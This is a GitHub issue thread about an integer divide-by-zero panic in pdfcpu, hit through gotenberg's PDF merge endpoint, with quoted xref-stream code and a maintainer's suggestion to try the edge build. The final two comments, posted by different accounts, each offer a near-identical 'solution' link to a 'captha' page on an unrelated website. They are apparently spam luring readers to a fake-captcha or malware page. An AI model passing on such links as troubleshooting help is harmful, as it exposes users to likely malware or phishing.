### ISSUE TITLE
panic: runtime error: integer divide by zero

### ISSUE THREAD

**Issue by arthurzou21** [gotenberg/gotenberg#1005]
When i use API `/forms/pdfengines/merge` to merge multiple docs, we get an error `panic: runtime error: integer divide by zero`.
And it about library pdfcpu@0.8.1. About code in `https://github.com/pdfcpu/pdfcpu/blob/v0.8.1/pkg/pdfcpu/read.go` line 530.
When do 
```
if len(buf)%xrefEntryLen > 0 {
		return errors.New("pdfcpu: extractXRefTableEntriesFromXRefStream: corrupt xrefstream")
	}
```
xrefEntryLen become 0. 
And 
```
i1 := xsd.W[0]
	i2 := xsd.W[1]
	i3 := xsd.W[2]

	xrefEntryLen := i1 + i2 + i3
```
when xrefEntryLen will be 0?

**Comment by gulien** [comment]
Out of curiosity, could you try with `gotenberg/gotenberg:edge`?

There might be an incompatibility issue with the PDFs version, as pdfcpu only handles PDF v1.7 and v2.0.

**Comment by arthurzou21** [comment]
hi @gulien 
gotenberg/gotenberg:edge? I first time hear about this.
Could you help explain what's the different between gotenberg/gotenberg:edge and gotenberg/gotenberg:8.11.0
thank you

**Comment by gulien** [comment]
That's the latest `main` branch build. I've switcher to `pdfcpu` CLI instead of the Go library for better resources/error management.

**Comment by arthurzou21** [comment]
hi @gulien Thank you for your reply. I will have a try

**Comment by hamdan7m** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by sushiltechnex** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)
